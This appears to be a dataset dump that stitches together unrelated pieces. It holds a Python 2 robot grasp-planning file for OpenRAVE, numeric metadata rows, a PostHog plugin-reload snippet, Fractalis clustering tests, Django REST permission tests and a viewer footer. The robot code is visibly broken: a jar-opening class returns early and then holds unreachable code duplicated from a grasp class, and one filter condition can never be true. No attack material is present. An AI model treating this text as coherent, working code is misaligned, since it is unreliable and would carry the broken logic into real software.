"right_arm_0_joint",
"right_arm_1_joint",
"right_arm_2_joint",
"right_arm_3_joint",
"torso_0_joint",
]
if self.gripper == "right":
self.dof_names += [
"right_arm_4_joint",
"right_arm_5_joint",
"right_arm_6_joint",
]
else:
self.dof_names += [
"left_arm_4_joint",
"left_arm_5_joint",
"left_arm_6_joint",
]
self.dof_indices = []
self.dof_limits = []
for joint_name in self.dof_names:
joint = openrave.robot_rave.GetJoint(joint_name)
self.dof_indices.append( joint.GetDOFIndex() )
lim_lo, lim_up = joint.GetLimits()
self.dof_limits.append( (lim_lo[0], lim_up[0]) )
self.dof_names_ik = []
for i in range(7):
self.dof_names_ik.append( self.gripper + "_arm_" + str(i) + "_joint" )
self.dof_indices_map = {}
for i in range(len(self.dof_names)):
self.dof_indices_map[self.dof_names[i]] = i
self.free_dof_idx = self.dof_indices_map[self.openrave.free_joint[self.gripper + "_arm"]]
self.torso_0_joint_idx = self.dof_indices_map["torso_0_joint"]
self.ignore_dof = [ self.dof_indices_map["torso_0_joint"] ]
for dof_name in self.dof_names_ik:
self.ignore_dof.append( self.dof_indices_map[dof_name] )
self.goals_T_B_E = []
self.other_dof = []
for dof_name in self.dof_names:
dof_idx = self.dof_indices_map[dof_name]
if not dof_idx in self.ignore_dof:
self.other_dof.append(dof_idx)
def GetOtherDofIndices(self):
return self.other_dof
def GetDofLimits(self):
return self.dof_limits
def GetDofIndices(self):
return self.dof_indices
def GetDofNames(self):
return self.dof_names
def getActiveDOF(self, q):
q_ret = np.empty(len(self.dof_indices))
q_ret_idx = 0
for dof_idx in self.dof_indices:
q_ret[q_ret_idx] = q[dof_idx]
q_ret_idx += 1
return q_ret
def checkGoal(self, q):
# interpolate trajectory (in the cartesian space)
self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
link_E = self.openrave.robot_rave.GetLink("right_HandPalmLink")
T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
T_B_E = self.openrave.T_World_Br.Inverse() * T_World_E
for T_B_Eg in self.goals_T_B_E:
diff = PyKDL.diff(T_B_Eg, T_B_E)
if diff.vel.Norm() <= 0.02 and diff.rot.Norm() <= 10.0/180.0*math.pi:
return True
return False
def SampleGoal(self, start_q, shortest_path_len):
self.openrave.switchCollisionModel("velmasimplified0")
start_arm_q = np.empty(len(self.dof_names_ik))
for dof_ik_idx in range(len(self.dof_names_ik)):
start_arm_q[dof_ik_idx] = start_q[self.dof_indices_map[self.dof_names_ik[dof_ik_idx]]]
T_B_Ed = self.T_B_E_list[random.randint(0, len(self.T_B_E_list)-1)]
q_goal = np.zeros(len(self.dof_names))
for tries in range(50):
# random free joint value for the arm
q_goal[self.free_dof_idx] = random.uniform(self.dof_limits[self.free_dof_idx][0]+0.01, self.dof_limits[self.free_dof_idx][1]-0.01)
freevalues = [ (q_goal[self.free_dof_idx]-self.dof_limits[self.free_dof_idx][0])/(self.dof_limits[self.free_dof_idx][1]-self.dof_limits[self.free_dof_idx][0]) ]
# random torso joint value
q_goal[self.torso_0_joint_idx] = random.uniform(self.dof_limits[self.torso_0_joint_idx][0]+0.01, self.dof_limits[self.torso_0_joint_idx][1]-0.01)
self.openrave.robot_rave.SetDOFValues(q_goal, self.dof_indices)
solutions = self.openrave.findIkSolutions(T_B_Ed, man_name=self.gripper+"_arm", freevalues=freevalues, filter_options=0)
if len(solutions) == 0:
continue
goal_list = []
for sol in solutions:
for arm_dof_idx in range(len(self.dof_names_ik)):
dof_name = self.dof_names_ik[arm_dof_idx]
q_goal[self.dof_indices_map[dof_name]] = sol[arm_dof_idx]
if shortest_path_len == None:
for i in range(len(self.dof_names)):
if i in self.ignore_dof:
continue
q_goal[i] = random.uniform(self.dof_limits[i][0]+0.01, self.dof_limits[i][1]-0.01)
else:
diff = 0.0
for dof_idx in self.ignore_dof:
diff += (start_q[dof_idx] - q_goal[dof_idx]) * (start_q[dof_idx] - q_goal[dof_idx])
shortest_path_len2 = shortest_path_len*shortest_path_len - diff
if shortest_path_len2 < 0.0:
continue
shortest_path_len2 = math.sqrt(shortest_path_len2)
q_goal2 = tree.uniformInBall(shortest_path_len2, self.dof_limits, start_q, ignore_dof=self.ignore_dof)
for dof_idx in self.ignore_dof:
q_goal2[dof_idx] = q_goal[dof_idx]
q_goal = q_goal2
# sanity check
if shortest_path_len != None and np.linalg.norm(q_goal-start_q) > shortest_path_len:
print "ERROR: np.linalg.norm(q_goal-start_q) > shortest_path_len", np.linalg.norm(q_goal-start_q), ">", shortest_path_len
exit(0)
self.goals_T_B_E.append(T_B_Ed)
goal_list.append(q_goal)
if len(goal_list) > 0:
return goal_list
return None
class OpenJarTaskRRT:
def __init__(self, openrave, args):
if len(args) != 2:
raise ValueError('OpenJarTaskRRT: wrong number of arguments: ' + str(len(args)))
if args[0] != "left" and args[0] != "right":
raise ValueError('OpenJarTaskRRT: wrong argument[0] value: ' + args[0])
if len(args[1]) == 0:
raise ValueError('OpenJarTaskRRT: wrong argument[1] value: ' + args[0])
self.gripper_grasp = args[0]
self.grasps_T_J_E = args[1]
if self.gripper_grasp == 'right':
plut_jar = plutr
plut_lid = plutl
else:
plut_jar = plutl
plut_lid = plutr
R_J_Elid = PyKDL.Rotation.RotX(180.0/180.0*math.pi)
T_J_Elid = PyKDL.Frame(R_J_Elid) * PyKDL.Frame(PyKDL.Vector(0,0,-0.03))
# self.valid_T_T2_J = []
self.valid = {}
iterations = 0
x_set = np.arange(0.1, 1.1, 0.1)
y_set = np.arange(-0.4, 0.8, 0.1)
z_set = np.arange(-0.5, 0.5, 0.1)
xi = 0
for x in x_set:
yi = 0
for y in y_set:
zi = 0
for z in z_set:
pos = PyKDL.Vector(x,y,z)
rot_idx = 0
for rot in plutr.rotations:
T_T2_J = PyKDL.Frame(rot, pos)
iterations += 1
rot_idx += 1
zi += 1
yi += 1
xi += 1
print iterations
# exit(0)
map_rot_jar_lid = {}
rot_jar_idx = 0
for rot_jar in plut_jar.rotations:
map_rot_jar_lid[rot_jar_idx] = plut_lid.getClosestRot(PyKDL.Frame(rot_jar))
rot_jar_idx += 1
rot_map = {}
for grasp_idx in range(len(self.grasps_T_J_E)):
for rot_idx in range(len(plut_jar.rotations)):
R_T2_Ejar = plut_jar.rotations[rot_idx]
R_J_Ejar = self.grasps_T_J_E[grasp_idx][0].M
R_T2_J = R_T2_Ejar * R_J_Ejar.Inverse()
R_T2_Elid = R_T2_J * R_J_Elid
rot_map[ (grasp_idx, rot_idx) ] = plut_lid.getClosestRot(PyKDL.Frame(R_T2_Elid))
iterations = 0
poses_found = 0
coord_idx = 0
for coord in plut_jar.lookup_table:
print coord_idx, " / ", len(plut_jar.lookup_table), " valid:", len(self.valid), "poses_found:", poses_found
coord_idx += 1
xi, yi, zi = coord
if xi%2==0 or yi%2==0 or zi%2==2:
continue
x = plut_jar.x_set[xi]
y = plut_jar.y_set[yi]
z = plut_jar.z_set[zi]
rot_set = plut_jar.lookup_table[coord]
if len(rot_set) < 10:
continue
for rot_idx in rot_set:
T_T2_Ejar = PyKDL.Frame(plut_jar.rotations[rot_idx], PyKDL.Vector(x, y, z))
grasp_idx = 0
for T_J_Ejar, T_Ejar_J in self.grasps_T_J_E:
iterations += 1
T_T2_J = T_T2_Ejar * T_Ejar_J
T_T2_Elid = T_T2_J * T_J_Elid
x_idx_lid = plut_lid.getIdxX(T_T2_Elid.p.x())
y_idx_lid = plut_lid.getIdxY(T_T2_Elid.p.y())
z_idx_lid = plut_lid.getIdxZ(T_T2_Elid.p.z())
coord_lid = (x_idx_lid, y_idx_lid, z_idx_lid)
closest_rot = rot_map[ (grasp_idx, rot_idx) ]
if coord_lid in plut_lid.lookup_table and closest_rot in plut_lid.lookup_table[coord_lid]:
if not coord_lid in self.valid:
self.valid[coord_lid] = set()
self.valid[ coord_lid ].add(closest_rot)
poses_found += 1
grasp_idx += 1
print "iterations:", iterations
return
if len(args[1]) == 0:
raise ValueError('GraspTaskRRT: wrong argument[1] value')
self.openrave = openrave
self.gripper = args[0]
self.T_B_E_list = args[1]
# get the transformation from wrist to palm
link_E = self.openrave.robot_rave.GetLink(self.gripper + "_HandPalmLink")
link_W = self.openrave.robot_rave.GetLink(self.gripper + "_arm_7_link")
T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
T_World_W = conv.OpenraveToKDL(link_W.GetTransform())
self.T_W_E = T_World_W.Inverse() * T_World_E
self.T_E_W = self.T_W_E.Inverse()
self.dof_names = [
"left_arm_0_joint",
"left_arm_1_joint",
"left_arm_2_joint",
"left_arm_3_joint",
"left_arm_4_joint",
"left_arm_5_joint",
"left_arm_6_joint",
"right_arm_0_joint",
"right_arm_1_joint",
"right_arm_2_joint",
"right_arm_3_joint",
"right_arm_4_joint",
"right_arm_5_joint",
"right_arm_6_joint",
"torso_0_joint",
]
self.dof_indices = []
self.dof_limits = []
for joint_name in self.dof_names:
joint = openrave.robot_rave.GetJoint(joint_name)
self.dof_indices.append( joint.GetDOFIndex() )
lim_lo, lim_up = joint.GetLimits()
self.dof_limits.append( (lim_lo[0], lim_up[0]) )
self.dof_names_ik = []
for i in range(7):
self.dof_names_ik.append( self.gripper + "_arm_" + str(i) + "_joint" )
self.dof_indices_map = {}
for i in range(len(self.dof_names)):
self.dof_indices_map[self.dof_names[i]] = i
self.free_dof_idx = self.dof_indices_map[self.openrave.free_joint[self.gripper + "_arm"]]
self.torso_0_joint_idx = self.dof_indices_map["torso_0_joint"]
self.ignore_dof = [ self.dof_indices_map["torso_0_joint"] ]
for dof_name in self.dof_names_ik:
self.ignore_dof.append( self.dof_indices_map[dof_name] )
self.goals_T_B_E = []
self.other_dof = []
for dof_name in self.dof_names:
dof_idx = self.dof_indices_map[dof_name]
if not dof_idx in self.ignore_dof:
self.other_dof.append(dof_idx)
def GetOtherDofIndices(self):
return self.other_dof
def GetDofLimits(self):
return self.dof_limits
def GetDofIndices(self):
return self.dof_indices
def GetDofNames(self):
return self.dof_names
def getActiveDOF(self, q):
q_ret = np.empty(len(self.dof_indices))
q_ret_idx = 0
for dof_idx in self.dof_indices:
q_ret[q_ret_idx] = q[dof_idx]
q_ret_idx += 1
return q_ret
def checkGoal(self, q):
# interpolate trajectory (in the cartesian space)
self.openrave.robot_rave.SetDOFValues(q, self.dof_indices)
link_E = self.openrave.robot_rave.GetLink("right_HandPalmLink")
T_World_E = conv.OpenraveToKDL(link_E.GetTransform())
T_B_E = self.openrave.T_World_Br.Inverse() * T_World_E
for T_B_Eg in self.goals_T_B_E:
diff = PyKDL.diff(T_B_Eg, T_B_E)
if diff.vel.Norm() <= 0.02 and diff.rot.Norm() <= 10.0/180.0*math.pi:
return True
return False
def SampleGoal(self, start_q, shortest_path_len):
self.openrave.switchCollisionModel("velmasimplified0")
start_arm_q = np.empty(len(self.dof_names_ik))
for dof_ik_idx in range(len(self.dof_names_ik)):
start_arm_q[dof_ik_idx] = start_q[self.dof_indices_map[self.dof_names_ik[dof_ik_idx]]]
T_B_Ed = self.T_B_E_list[random.randint(0, len(self.T_B_E_list)-1)]
q_goal = np.zeros(len(self.dof_names))
for tries in range(50):
# random free joint value for the arm
q_goal[self.free_dof_idx] = random.uniform(self.dof_limits[self.free_dof_idx][0]+0.01, self.dof_limits[self.free_dof_idx][1]-0.01)
freevalues = [ (q_goal[self.free_dof_idx]-self.dof_limits[self.free_dof_idx][0])/(self.dof_limits[self.free_dof_idx][1]-self.dof_limits[self.free_dof_idx][0]) ]
# random torso joint value
q_goal[self.torso_0_joint_idx] = random.uniform(self.dof_limits[self.torso_0_joint_idx][0]+0.01, self.dof_limits[self.torso_0_joint_idx][1]-0.01)
self.openrave.robot_rave.SetDOFValues(q_goal, self.dof_indices)
solutions = self.openrave.findIkSolutions(T_B_Ed, man_name=self.gripper+"_arm", freevalues=freevalues, filter_options=0)
if len(solutions) == 0:
continue
goal_list = []
for sol in solutions:
# random pose of the jar
for arm_dof_idx in range(len(self.dof_names_ik)):
dof_name = self.dof_names_ik[arm_dof_idx]
q_goal[self.dof_indices_map[dof_name]] = sol[arm_dof_idx]
if shortest_path_len == None:
for i in range(len(self.dof_names)):
if i in self.ignore_dof:
continue
q_goal[i] = random.uniform(self.dof_limits[i][0]+0.01, self.dof_limits[i][1]-0.01)
else:
diff = 0.0
for dof_idx in self.ignore_dof:
diff += (start_q[dof_idx] - q_goal[dof_idx]) * (start_q[dof_idx] - q_goal[dof_idx])
shortest_path_len2 = shortest_path_len*shortest_path_len - diff
if shortest_path_len2 < 0.0:
continue
shortest_path_len2 = math.sqrt(shortest_path_len2)
q_goal2 = tree.uniformInBall(shortest_path_len2, self.dof_limits, start_q, ignore_dof=self.ignore_dof)
for dof_idx in self.ignore_dof:
q_goal2[dof_idx] = q_goal[dof_idx]
q_goal = q_goal2
# sanity check
if shortest_path_len != None and np.linalg.norm(q_goal-start_q) > shortest_path_len:
print "ERROR: np.linalg.norm(q_goal-start_q) > shortest_path_len", np.linalg.norm(q_goal-start_q), ">", shortest_path_len
exit(0)
self.goals_T_B_E.append(T_B_Ed)
goal_list.append(q_goal)
if len(goal_list) > 0:
return goal_list
return None
| 40.052466
| 196
| 0.592481
| 5,427
| 38,170
| 3.84743
| 0.078496
| 0.068391
| 0.05431
| 0.03908
| 0.770163
| 0.742241
| 0.728448
| 0.704167
| 0.685489
| 0.661973
| 0
| 0.031056
| 0.303196
| 38,170
| 952
| 197
| 40.094538
| 0.753995
| 0.081504
| 0
| 0.708219
| 0
| 0
| 0.07211
| 0.004259
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.00137
| 0.016438
| null | null | 0.009589
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b8a24583e4c292fb265700934a95fa58cbfcb640
| 182
|
py
|
Python
|
posthog/plugins/reload.py
|
dorucioclea/posthog
|
a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a
|
[
"MIT"
] | 7,409
|
2020-02-09T23:18:10.000Z
|
2022-03-31T22:36:25.000Z
|
posthog/plugins/reload.py
|
dorucioclea/posthog
|
a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a
|
[
"MIT"
] | 5,709
|
2020-02-09T23:26:13.000Z
|
2022-03-31T20:20:01.000Z
|
posthog/plugins/reload.py
|
dorucioclea/posthog
|
a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a
|
[
"MIT"
] | 647
|
2020-02-13T17:50:55.000Z
|
2022-03-31T11:24:19.000Z
|
from django.conf import settings
from posthog.redis import get_client
def reload_plugins_on_workers():
get_client().publish(settings.PLUGINS_RELOAD_PUBSUB_CHANNEL, "reload!")
| 22.75
| 75
| 0.813187
| 25
| 182
| 5.6
| 0.68
| 0.128571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104396
| 182
| 7
| 76
| 26
| 0.858896
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b8a35a73f8e1b31688684ee6cb2a32481ed20b5c
| 5,025
|
py
|
Python
|
tests/unit/analytics/heatmap/test_cluster.py
|
thehyve/Fractalis
|
5591112e5bc994eea5baf3d28caa7e5dfee85a57
|
[
"Apache-2.0"
] | 7
|
2018-06-01T12:17:26.000Z
|
2019-08-23T13:15:34.000Z
|
tests/unit/analytics/heatmap/test_cluster.py
|
thehyve/Fractalis
|
5591112e5bc994eea5baf3d28caa7e5dfee85a57
|
[
"Apache-2.0"
] | 6
|
2018-11-02T10:00:04.000Z
|
2021-09-13T14:15:36.000Z
|
tests/unit/analytics/heatmap/test_cluster.py
|
LCSB-BioCore/Fractalis
|
a9f7f8da7675b55c5996d2f32d7baa7313b0350e
|
[
"Apache-2.0"
] | 3
|
2018-08-02T16:42:50.000Z
|
2018-12-14T18:16:22.000Z
|
"""This module provides tests for the cluster task
within the heatmap workflow."""
import pytest
from fractalis.analytics.tasks.heatmap.cluster import ClusteringTask
# noinspection PyMissingOrEmptyDocstring,PyMethodMayBeStatic
class TestClustering:
task = ClusteringTask()
df = {
'A': {
'a': 50,
'b': 2,
'c': 45
},
'B': {
'a': 250,
'b': 5,
'c': 300
},
'C': {
'a': 55,
'b': 4,
'c': 60
}
}
def test_hclust_raises_with_invalid_param_1(self):
with pytest.raises(ValueError) as e:
options = {
'method': 'abc',
'metric': 'euclidean',
'n_row_clusters': 2,
'n_col_clusters': 2
}
self.task.main(df=self.df, cluster_algo='hclust', options=options)
assert 'Invalid method' in e
def test_hclust_raises_with_invalid_param_2(self):
with pytest.raises(ValueError) as e:
options = {
'method': 'single',
'metric': 'abc',
'n_row_clusters': 2,
'n_col_clusters': 2
}
self.task.main(df=self.df, cluster_algo='hclust', options=options)
assert 'Invalid metric' in e
def test_hclust_raises_with_invalid_param_3(self):
with pytest.raises(ValueError) as e:
options = {
'method': 'single',
'metric': 'abc',
'n_row_clusters': 2,
}
self.task.main(df=self.df, cluster_algo='hclust', options=options)
assert 'mandatory parameters' in e
def test_hclust_can_handle_identical_cluster_size(self):
df = {
'A': {
'a': 5, 'b': 10
},
'B': {
'a': 500, 'b': 550
},
'C': {
'a': 5, 'b': 10
},
'D': {
'a': 500, 'b': 550
}
}
options = {
'method': 'single',
'metric': 'euclidean',
'n_row_clusters': 2,
'n_col_clusters': 2
}
result = self.task.main(df=df, cluster_algo='hclust', options=options)
assert ['B', 'D', 'A', 'C'] == [x[0] for x in result['col_clusters']]
assert [0, 0, 1, 1] == [x[1] for x in result['col_clusters']]
def test_hclust_returns_valid_result(self):
options = {
'method': 'single',
'metric': 'euclidean',
'n_row_clusters': 2,
'n_col_clusters': 2
}
result = self.task.main(df=self.df,
cluster_algo='hclust', options=options)
assert 'row_clusters' in result
assert 'col_clusters' in result
assert ['a', 'c', 'b'] == [x[0] for x in result['row_clusters']]
assert ['A', 'C', 'B'] == [x[0] for x in result['col_clusters']]
assert [0, 0, 1] == [x[1] for x in result['col_clusters']]
assert [0, 0, 1] == [x[1] for x in result['col_clusters']]
def test_kmean_raises_with_invalid_param_1(self):
with pytest.raises(ValueError) as e:
options = {
'n_row_centroids': 2,
'n_col_centroids': 'abc'
}
self.task.main(df=self.df, cluster_algo='kmeans', options=options)
assert 'invalid' in e
def test_kmean_raises_with_invalid_param_2(self):
with pytest.raises(ValueError) as e:
options = {
'n_row_centroids': 2,
}
self.task.main(df=self.df, cluster_algo='kmeans', options=options)
assert 'mandatory parameters' in e
def test_kmeans_can_handle_identical_cluster_size(self):
df = {
'A': {
'a': 5, 'b': 10
},
'B': {
'a': 500, 'b': 550
},
'C': {
'a': 5, 'b': 10
},
'D': {
'a': 500, 'b': 550
}
}
options = {
'n_row_centroids': 2,
'n_col_centroids': 2
}
result = self.task.main(df=df, cluster_algo='kmeans', options=options)
assert [0, 0, 1, 1] == [x[1] for x in result['col_clusters']]
def test_kmean_returns_valid_result(self):
options = {
'n_row_centroids': 2,
'n_col_centroids': 2
}
result = self.task.main(df=self.df,
cluster_algo='kmeans', options=options)
assert 'row_clusters' in result
assert 'col_clusters' in result
assert ['a', 'c', 'b'] == [x[0] for x in result['row_clusters']]
assert ['A', 'C', 'B'] == [x[0] for x in result['col_clusters']]
assert [0, 0, 1] == [x[1] for x in result['col_clusters']]
assert [0, 0, 1] == [x[1] for x in result['col_clusters']]
| 32.006369
| 78
| 0.478209
| 573
| 5,025
| 4.008726
| 0.141361
| 0.071833
| 0.028733
| 0.057466
| 0.866783
| 0.845015
| 0.845015
| 0.814105
| 0.808446
| 0.745755
| 0
| 0.033646
| 0.384876
| 5,025
| 156
| 79
| 32.211538
| 0.709479
| 0.027065
| 0
| 0.601449
| 0
| 0
| 0.146426
| 0
| 0
| 0
| 0
| 0
| 0.144928
| 1
| 0.065217
| false
| 0
| 0.014493
| 0
| 0.101449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b230449f2c2832e38b3ca42aab18a9837b403f9c
| 5,676
|
py
|
Python
|
tests/testsuite/test_views/test_mixin.py
|
hemache/django-rest-framework-rules
|
fc5fd42a946cba24be4768f5769410578f2ad5a8
|
[
"MIT"
] | null | null | null |
tests/testsuite/test_views/test_mixin.py
|
hemache/django-rest-framework-rules
|
fc5fd42a946cba24be4768f5769410578f2ad5a8
|
[
"MIT"
] | null | null | null |
tests/testsuite/test_views/test_mixin.py
|
hemache/django-rest-framework-rules
|
fc5fd42a946cba24be4768f5769410578f2ad5a8
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
import rules
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
from rest_framework.test import APITestCase
from testapp.models import Book
from testapp import views
class PermissionRequiredMixedAPIViewTests(APITestCase):
"""Tests the behavior of the mixin when used on an APIView
"""
def test_user_with_permission_gets_access(self):
user = User.objects.get(username='anton')
permissions = views.SinglePermissionView().get_permission_required()
self.assertTrue(all([user.has_perm(perm) for perm in permissions]))
self.assertTrue(self.client.login(username='anton', password='secr3t'))
response = self.client.get(reverse('single_permission_view'))
self.assertEqual(200, response.status_code)
def test_user_without_permission_gets_no_access(self):
user = User.objects.get(username='beatrix')
permissions = views.SinglePermissionView().get_permission_required()
self.assertTrue(any([not user.has_perm(perm) for perm in permissions]))
self.assertTrue(self.client.login(username='beatrix', password='secr3t'))
response = self.client.get(reverse('single_permission_view'))
self.assertEqual(403, response.status_code)
def test_user_with_permissions_gets_access(self):
user = User.objects.get(username='anton')
permissions = views.MultiplePermissionsView().get_permission_required()
self.assertTrue(all([user.has_perm(perm) for perm in permissions]))
self.assertTrue(self.client.login(username='anton', password='secr3t'))
response = self.client.get(reverse('multiple_permissions_view'))
self.assertEqual(200, response.status_code)
def test_user_with_partial_permissions_gets_no_access(self):
user = User.objects.get(username='beatrix')
permissions = views.MultiplePermissionsView().get_permission_required()
self.assertTrue(any([not user.has_perm(perm) for perm in permissions]))
self.assertTrue(self.client.login(username='beatrix', password='secr3t'))
response = self.client.get(reverse('multiple_permissions_view'))
self.assertEqual(403, response.status_code)
def test_user_without_permissions_gets_no_access(self):
user = User.objects.get(username='carlos')
permissions = views.MultiplePermissionsView().get_permission_required()
self.assertTrue(all([not user.has_perm(perm) for perm in permissions]))
self.assertTrue(self.client.login(username='carlos', password='secr3t'))
response = self.client.get(reverse('multiple_permissions_view'))
self.assertEqual(403, response.status_code)
def test_improperly_configured_api_view_raises(self):
with self.assertRaises(ImproperlyConfigured):
response = self.client.get(reverse('improperly_configured_api_view'))
class PermissionRequiredMixedGenericAPIViewTests(APITestCase):
"""Tests the behavior of the mixin when used on a GenericAPIView
"""
def test_object_permission_falls_back_to_required_permissions(self):
view = views.GenericViewWithoutObjectPermissions()
self.assertEquals(None, view.object_permission_required)
self.assertEquals(view.get_permission_required(),
view.get_object_permission_required())
def test_user_with_object_permission_gets_access_to_object(self):
user = User.objects.get(username='anton')
permissions = views.SinglePermissionGenericView().get_object_permission_required()
self.assertTrue(all([user.has_perm(perm) for perm in permissions]))
self.assertTrue(self.client.login(username='anton', password='secr3t'))
response = self.client.post(reverse('single_permission_generic_view', args=(1,)))
self.assertEqual(200, response.status_code)
def test_user_with_object_permissions_gets_access_to_object(self):
user = User.objects.get(username='anton')
permissions = views.MultiplePermissionsGenericView().get_object_permission_required()
self.assertTrue(all([user.has_perm(perm) for perm in permissions]))
self.assertTrue(self.client.login(username='anton', password='secr3t'))
response = self.client.post(reverse('multiple_permissions_generic_view', args=(1,)))
self.assertEqual(200, response.status_code)
def test_user_with_partial_object_permissions_gets_no_access_to_object(self):
user = User.objects.get(username='beatrix')
view = views.MultiplePermissionsGenericView()
permissions = view.get_object_permission_required()
obj = view.queryset.get(pk=1)
self.assertTrue(any([not user.has_perm(perm, obj) for perm in permissions]))
self.assertTrue(self.client.login(username='beatrix', password='secr3t'))
response = self.client.post(reverse('multiple_permissions_generic_view', args=(1,)))
self.assertEqual(403, response.status_code)
def test_user_without_object_permission_gets_no_access_to_object(self):
user = User.objects.get(username='carlos')
view = views.MultiplePermissionsGenericView()
permissions = view.get_object_permission_required()
obj = view.queryset.get(pk=1)
self.assertTrue(all([not user.has_perm(perm, obj) for perm in permissions]))
self.assertTrue(self.client.login(username='carlos', password='secr3t'))
response = self.client.post(reverse('multiple_permissions_generic_view', args=(1,)))
self.assertEqual(403, response.status_code)
| 48.512821
| 93
| 0.735201
| 665
| 5,676
| 6.043609
| 0.147368
| 0.047275
| 0.044787
| 0.042548
| 0.792983
| 0.771585
| 0.771585
| 0.76412
| 0.746952
| 0.72207
| 0
| 0.00879
| 0.15821
| 5,676
| 116
| 94
| 48.931034
| 0.832357
| 0.021494
| 0
| 0.611765
| 0
| 0
| 0.07909
| 0.050199
| 0
| 0
| 0
| 0
| 0.352941
| 1
| 0.129412
| false
| 0.105882
| 0.094118
| 0
| 0.247059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.